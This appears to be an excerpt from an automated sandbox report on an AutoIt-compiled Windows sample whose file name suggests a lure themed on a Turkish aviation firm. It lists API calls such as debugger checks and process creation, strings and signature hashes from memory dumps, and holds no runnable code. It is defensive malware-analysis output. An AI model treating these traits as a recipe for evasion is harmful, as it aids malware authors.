                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                    • Opcode ID: 4ebec9d5d63e3ff142424679dba9fb78871ab0a420f60391088b0cbcd5645a01
                                                                                                                                    • Instruction ID: bd74d4d0974b0d11269f6ef7ab4f83b6bdaefae2bfb129b63e93917e9bdbc3f6
                                                                                                                                    • Opcode Fuzzy Hash: 4ebec9d5d63e3ff142424679dba9fb78871ab0a420f60391088b0cbcd5645a01
                                                                                                                                    • Instruction Fuzzy Hash: B401D67568155877CB08FBA1CA05AFE73AC9B22340F680015B812B7282EB319F18DB71
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00253018,0025305C), ref: 002181BF
                                                                                                                                    • CloseHandle.KERNEL32 ref: 002181D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: \0%
                                                                                                                                    • API String ID: 3712363035-245754994
                                                                                                                                    • Opcode ID: 2e33d2152d152e6883c23f9b48c7d46a8b83cf0151e870ef05527e3976c7fbb8
                                                                                                                                    • Instruction ID: 979529f3ee274ad5b7675172cfb1f5be331c51682be7bb2362696d3db0a35830
                                                                                                                                    • Opcode Fuzzy Hash: 2e33d2152d152e6883c23f9b48c7d46a8b83cf0151e870ef05527e3976c7fbb8
                                                                                                                                    • Instruction Fuzzy Hash: 46F05EB6650300BAE720AB65BC49FB73A5CEB197A2F005460FB08D51E2D6768E1482FC
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: 3, 3, 16, 1
                                                                                                                                    • API String ID: 176396367-3042988571
                                                                                                                                    • Opcode ID: c4b1202cba776ed1d2131395a1bd55ac3ade88fbf62b943f2222a801cfa17936
                                                                                                                                    • Instruction ID: 8efe590b71e3e839715ddf10ff0b0365761797353908a758741696d31a9461df
                                                                                                                                    • Opcode Fuzzy Hash: c4b1202cba776ed1d2131395a1bd55ac3ade88fbf62b943f2222a801cfa17936
                                                                                                                                    • Instruction Fuzzy Hash: 7EE02B0AA2436111D3311A799CC197F96ADDFDA750710182BF981C22A7EBD49DB193A0
                                                                                                                                    APIs
                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001E0B23
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message
                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                    • Opcode ID: 656e78c6f1b494dd3028eb5ff2bbdbf1463ca7bfa24e799b8512f2f5a552ffc6
                                                                                                                                    • Instruction ID: 25097994f18ce62e2512420bf80f3ee03dcfb502b9f01b394ae05490114e360e
                                                                                                                                    • Opcode Fuzzy Hash: 656e78c6f1b494dd3028eb5ff2bbdbf1463ca7bfa24e799b8512f2f5a552ffc6
                                                                                                                                    • Instruction Fuzzy Hash: C7E0D83528431837D21437947C03FC97AC49F26F20F20042AF788954C38BD224A006E9
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0019F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001A0D71,?,?,?,0018100A), ref: 0019F7CE
                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0018100A), ref: 001A0D75
                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0018100A), ref: 001A0D84
                                                                                                                                    Strings
                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001A0D7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                    • Opcode ID: 2bf75f20d9c7e9109b051145c5be69d05b8a64e8f52b65f6854ad0dcc69c23fd
                                                                                                                                    • Instruction ID: 13236b64df556c197fd6eee0de881b25f3b3090e3ff3f2fdbf3b7898d515b6d6
                                                                                                                                    • Opcode Fuzzy Hash: 2bf75f20d9c7e9109b051145c5be69d05b8a64e8f52b65f6854ad0dcc69c23fd
                                                                                                                                    • Instruction Fuzzy Hash: 56E092782007018BD3719FF8E5083827BE0AF29780F00896DE896C6751DBF4E4888B91
                                                                                                                                    APIs
                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0019E3D5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                    • String ID: 0%%$8%%
                                                                                                                                    • API String ID: 1385522511-3448817212
                                                                                                                                    • Opcode ID: 1a64c023a978ec8075bd2ac067a42d9211d40583e6d1f4efee73f145acc76fdf
                                                                                                                                    • Instruction ID: fe2e9fe55c2f5ba70678d855d8265024ed3195dde859e50f41574f4a3f4627c9
                                                                                                                                    • Opcode Fuzzy Hash: 1a64c023a978ec8075bd2ac067a42d9211d40583e6d1f4efee73f145acc76fdf
                                                                                                                                    • Instruction Fuzzy Hash: E5E08635434B10CBCE0DDF18FA59A983395FB3B321B911169E5128B1D1BB316989865D
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LocalTime
                                                                                                                                    • String ID: %.3d$X64
                                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                                    • Opcode ID: 0b88279c70fc5a1e3d2c46249215503bc18c46fc10cc663af2eb6b608330e302
                                                                                                                                    • Instruction ID: 3bbee54275e67ac1b4babf491bc15a6b9d89377e663a576b7bba5f635c2ebbd1
                                                                                                                                    • Opcode Fuzzy Hash: 0b88279c70fc5a1e3d2c46249215503bc18c46fc10cc663af2eb6b608330e302
                                                                                                                                    • Instruction Fuzzy Hash: D3D012A5848108FACF589AD0EC498FAB37CAB28341F618453FC06D1140D734C5096761
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0021232C
                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0021233F
                                                                                                                                      • Part of subcall function 001EE97B: Sleep.KERNEL32 ref: 001EE9F3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                    • Opcode ID: 15a195ebc6957936d2533bdfd8c7ae9d7bfecaa6acae0c8e5850965955037c45
                                                                                                                                    • Instruction ID: baeef4556fdad8d20d9829f3c1d9263330f569e72fe46ed5167cec1c85200c23
                                                                                                                                    • Opcode Fuzzy Hash: 15a195ebc6957936d2533bdfd8c7ae9d7bfecaa6acae0c8e5850965955037c45
                                                                                                                                    • Instruction Fuzzy Hash: C4D0223A3D0340BBE26CB770EC0FFCABA489B20B00F2089027305AA0D0CDF0A800CB00
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0021236C
                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00212373
                                                                                                                                      • Part of subcall function 001EE97B: Sleep.KERNEL32 ref: 001EE9F3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                    • Opcode ID: 3938f8d426ef5182c1f4e9b5bc5398f37347c7777902e5c3a5b878563d7880c2
                                                                                                                                    • Instruction ID: 2d2eb0fa7ced52cbce2d3f792fed6549575747efd896568ea69a908aae3165e8
                                                                                                                                    • Opcode Fuzzy Hash: 3938f8d426ef5182c1f4e9b5bc5398f37347c7777902e5c3a5b878563d7880c2
                                                                                                                                    • Instruction Fuzzy Hash: 38D0A9363C03407AE268A770EC0FFCAA6489B21B00F2089027201AA0D0C9E0A800CA04